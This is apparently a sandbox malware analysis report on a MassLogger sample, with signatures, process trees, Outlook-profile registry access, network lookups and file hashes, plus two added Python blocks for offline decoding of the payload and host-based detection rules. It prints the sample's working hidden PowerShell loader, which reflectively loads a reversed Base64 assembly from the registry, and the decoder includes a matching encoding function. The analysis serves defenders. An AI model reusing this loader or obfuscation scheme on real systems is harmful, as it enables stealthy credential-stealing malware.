Analysis Overview
SHA256
0b6f160d8baf8abce7f7f540cf6d70bd94adc28257c294bacf7476c30518d40a
Threat Level: Known bad
The file Attachment.rar was found to be: Known bad.
Malicious Activity Summary
Masslogger family
MassLogger
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Suspicious use of AdjustPrivilegeToken
outlook_win_path
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-07-04 12:03
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-04 12:03
Reported
2025-07-04 12:06
Platform
win10v2004-20250502-en
Max time kernel
143s
Max time network
142s
Signatures
MassLogger
Masslogger family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2364 set thread context of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"
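The PowerShell command line above is the registry-resident second stage: it reads value test under HKCU:\Software\YSSUOWOXajxtsHt, reverses every string it finds there character by character, concatenates the results, Base64-decodes them into a .NET assembly, loads it with Assembly.Load and calls [hem.hem]::hem with the key's leaf name (YSSUOWOXajxtsHt, which is also the name of the persistence script dropped under AppData\Roaming). The Python below is an added example, not code from the report, the sandbox or the sample: it reproduces that transform so the blob can be recovered offline from a registry export. The fake PE image and the chunk sizes are constructed test data; whether the real value is a single REG_SZ or a REG_MULTI_SZ is not stated on the page, so both shapes are handled.

```python
from __future__ import annotations

import base64
import re
import struct

# Command line recorded in the Processes section above (binary name shortened).
LOADER_CMDLINE = r"""powershell.exe -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])"""

_STAGE_RE = re.compile(r"\$r='(?P<key>[^']+)';\$v='(?P<value>[^']+)'")


def parse_loader_cmdline(cmdline: str):
    """Return (registry key, value name) the loader reads, or None."""
    m = _STAGE_RE.search(cmdline)
    if not m:
        return None
    return m.group("key"), m.group("value")


def decode_like_loader(stored) -> bytes:
    """Inverse of the obfuscation, mirroring
    ($d.$v | %{ $_[-1..-($_.Length)] }) -join '' : reverse each stored
    string (a REG_SZ, or every element of a REG_MULTI_SZ, in order),
    concatenate, then Base64-decode."""
    strings = [stored] if isinstance(stored, str) else list(stored)
    joined = "".join(s[::-1] for s in strings)
    return base64.b64decode(joined, validate=True)


def encode_like_loader(payload: bytes, chunk: int | None = None) -> list[str]:
    """What a dropper must write for the loader above to work: Base64 text,
    optionally split into chunks, each chunk reversed. The dropper stage is
    not on the page; this exists only to build test data."""
    b64 = base64.b64encode(payload).decode("ascii")
    if chunk is None:
        return [b64[::-1]]
    return [b64[i:i + chunk][::-1] for i in range(0, len(b64), chunk)]


def looks_like_pe(data: bytes) -> bool:
    """Sanity check that the decoded blob is a PE image: Assembly.Load only
    accepts one, so a correct decode of a real payload must pass this."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe() -> bytes:
    """Constructed stand-in for the stored assembly (DOS header, e_lfanew and
    the PE signature only). Not the sample's payload."""
    img = bytearray(0x80 + 4 + 64)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)
    img[0x80:0x84] = b"PE\x00\x00"
    return bytes(img)


def entry_argument(key: str) -> str:
    r"""Mirror $r.Split('\')[-1]: the leaf name of the key, which is the
    string passed to [hem.hem]::hem and, in this report, the base name of
    %APPDATA%\YSSUOWOXajxtsHt.VBS."""
    return key.split("\\")[-1]


if __name__ == "__main__":
    key, value = parse_loader_cmdline(LOADER_CMDLINE)
    stored = encode_like_loader(build_fake_pe(), chunk=50)  # simulate REG_MULTI_SZ
    blob = decode_like_loader(stored)
    print(key, value, entry_argument(key), looks_like_pe(blob))
```

To use it on a live case, export the key with reg export and feed the value's string(s) to decode_like_loader; a blob that fails looks_like_pe means the stored data was split or encoded differently from what this command line implies and should be checked by hand.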
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.80.1:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/2364-2-0x000001FCD6B90000-0x000001FCD6BA0000-memory.dmp
memory/2364-1-0x000001FCD6B90000-0x000001FCD6BA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqcpt1ye.f54.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2364-12-0x000001FCBE5E0000-0x000001FCBE602000-memory.dmp
memory/2364-13-0x000001FCBCD60000-0x000001FCBCD6A000-memory.dmp
memory/2364-14-0x000001FCD6B70000-0x000001FCD6B7A000-memory.dmp
memory/3684-15-0x0000000000D10000-0x0000000000D2C000-memory.dmp
memory/3684-18-0x00000000056D0000-0x0000000005C74000-memory.dmp
memory/3684-19-0x0000000005200000-0x000000000529C000-memory.dmp
memory/3684-20-0x00000000063E0000-0x0000000006472000-memory.dmp
memory/3684-21-0x0000000006390000-0x00000000063E0000-memory.dmp
memory/3684-22-0x0000000006750000-0x0000000006912000-memory.dmp
memory/3684-23-0x00000000066F0000-0x00000000066FA000-memory.dmp
C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS
| MD5 | 1cacd0362bf0f7c175193309f29b89b1 |
| SHA1 | 9806970450b0294338bc13fd80b7ae56841d24b0 |
| SHA256 | f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778 |
| SHA512 | a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-07-04 12:03
Reported
2025-07-04 12:06
Platform
win11-20250502-en
Max time kernel
144s
Max time network
111s
Signatures
MassLogger
Masslogger family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3892 set thread context of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"
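The chain in this detonation is WScript.exe (the .vbe from Temp) spawning a hidden powershell.exe that loads an assembly from HKCU, which in turn launches AddInProcess32.exe with no arguments and takes over its main thread (the SetThreadContext signature, PID 3892 onto 4040), plus a second WScript.exe running the persistence script under AppData\Roaming and DNS lookups for checkip.dyndns.org and reallyfreegeoip.org. As an added example that is not part of the report or the sandbox's rule set, the Python below expresses those observations as four host-based checks and runs them over constructed Sysmon-style events. The PIDs and command lines come from this report; the parent of the second WScript.exe, the process issuing the DNS queries, and the two benign control events (an AddInProcess32 started by a managed host with /guid and /pid, a browser lookup) are assumptions.

```python
from __future__ import annotations

import ntpath
import re

# Constructed Sysmon-style telemetry modelled on this detonation. PIDs 3892/4040
# and command lines are from the report; the ppid of event 4, the process behind
# event 5, and the benign control events 6-7 are assumed.
EVENTS = [
    {"id": 1, "kind": "process", "pid": 5400, "ppid": 1200,
     "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"'},
    {"id": 2, "kind": "process", "pid": 3892, "ppid": 5400,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])"},
    {"id": 3, "kind": "process", "pid": 4040, "ppid": 3892,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"'},
    {"id": 4, "kind": "process", "pid": 6012, "ppid": 4040,  # parent assumed
     "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"'},
    {"id": 5, "kind": "dns", "pid": 4040,  # querying process assumed
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "query": "checkip.dyndns.org"},
    {"id": 6, "kind": "process", "pid": 7000, "ppid": 6900,  # benign control
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" /guid:a1b2 /pid:6900'},
    {"id": 7, "kind": "dns", "pid": 7100,  # benign control
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "query": "reallyfreegeoip.org"},
]

IP_LOOKUP_DOMAINS = {"checkip.dyndns.org", "reallyfreegeoip.org"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
USER_SCRIPT_RE = re.compile(r"\\AppData\\(Roaming|Local\\Temp)\\[^\\]+?\.vb[es]\b", re.I)


def _base(image: str) -> str:
    return ntpath.basename(image).lower()


def registry_resident_loader(ev) -> bool:
    """powershell.exe reading Base64 from a registry hive and loading it
    reflectively, as in the command line recorded above."""
    if ev["kind"] != "process" or _base(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    c = ev["cmdline"]
    return ("Reflection.Assembly" in c and "FromBase64String" in c
            and any(h in c for h in ("HKCU:", "HKLM:", "Registry::"))
            and re.search(r"\bgp\b|Get-ItemProperty", c, re.I) is not None)


def addinprocess_bare_launch(ev) -> bool:
    """AddInProcess32.exe is the .NET add-in host; a managed host starts it
    with /guid and /pid. A bare launch is the hollowing target seen here."""
    if ev["kind"] != "process" or _base(ev["image"]) not in {"addinprocess32.exe", "addinprocess.exe"}:
        return False
    args = ev["cmdline"].lower()
    return "/guid" not in args and "/pid" not in args


def script_host_user_profile(ev) -> bool:
    """wscript/cscript running a .vbs/.vbe out of Temp or the Roaming root."""
    return (ev["kind"] == "process" and _base(ev["image"]) in SCRIPT_HOSTS
            and USER_SCRIPT_RE.search(ev["cmdline"]) is not None)


def ip_lookup_nonbrowser(ev) -> bool:
    """External-IP web services resolved by something that is not a browser."""
    return (ev["kind"] == "dns" and ev["query"].lower() in IP_LOOKUP_DOMAINS
            and _base(ev["image"]) not in BROWSERS)


RULES = (registry_resident_loader, addinprocess_bare_launch,
         script_host_user_profile, ip_lookup_nonbrowser)


def evaluate(events) -> list[tuple[int, str]]:
    """(event id, rule name) for every rule that fires on every event."""
    return [(ev["id"], r.__name__) for ev in events for r in RULES if r(ev)]


def loader_to_hollowed_child(events, hits) -> list[tuple[int, int]]:
    """Pair a loader hit with a bare AddInProcess child it spawned: the
    parent/child link behind 'PID 3892 set thread context of 4040'."""
    procs = {e["pid"]: e for e in events if e["kind"] == "process"}
    fired = set(hits)
    pairs = []
    for e in events:
        if (e["id"], "addinprocess_bare_launch") in fired:
            parent = procs.get(e["ppid"])
            if parent and (parent["id"], "registry_resident_loader") in fired:
                pairs.append((parent["pid"], e["pid"]))
    return pairs


if __name__ == "__main__":
    found = evaluate(EVENTS)
    for hit in found:
        print(hit)
    print(loader_to_hollowed_child(EVENTS, found))
```

The single-event checks are deliberately narrow (the AddInProcess rule keys on the missing /guid and /pid switches rather than on the parent, so it also fires when the parent is something other than PowerShell); the parent/child pairing is what raises confidence from "odd" to "process hollowing in progress", and it is the pairing that maps to the SetThreadContext signature rather than any one row above.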
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 104.21.112.1:443 | reallyfreegeoip.org | tcp |
| US | 52.111.227.11:443 | | tcp |
Files
memory/3892-1-0x00007FF817973000-0x00007FF817975000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_figmuiqx.hbx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3892-10-0x0000019F31710000-0x0000019F31732000-memory.dmp
memory/3892-11-0x00007FF817970000-0x00007FF818432000-memory.dmp
memory/3892-12-0x00007FF817970000-0x00007FF818432000-memory.dmp
memory/3892-13-0x00007FF817970000-0x00007FF818432000-memory.dmp
memory/3892-14-0x0000019F19440000-0x0000019F1944A000-memory.dmp
memory/3892-15-0x0000019F31700000-0x0000019F3170A000-memory.dmp
memory/4040-16-0x0000000000540000-0x000000000055C000-memory.dmp
memory/4040-19-0x00000000751AE000-0x00000000751AF000-memory.dmp
memory/4040-20-0x00000000054F0000-0x0000000005A96000-memory.dmp
memory/4040-21-0x0000000004FE0000-0x000000000507C000-memory.dmp
memory/4040-22-0x0000000006000000-0x0000000006092000-memory.dmp
memory/4040-23-0x0000000005FB0000-0x0000000006000000-memory.dmp
memory/3892-24-0x00007FF817970000-0x00007FF818432000-memory.dmp
memory/4040-25-0x0000000006370000-0x0000000006532000-memory.dmp
memory/4040-26-0x0000000006300000-0x000000000630A000-memory.dmp
memory/4040-27-0x00000000751AE000-0x00000000751AF000-memory.dmp
C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS
| MD5 | 1cacd0362bf0f7c175193309f29b89b1 |
| SHA1 | 9806970450b0294338bc13fd80b7ae56841d24b0 |
| SHA256 | f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778 |
| SHA512 | a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507 |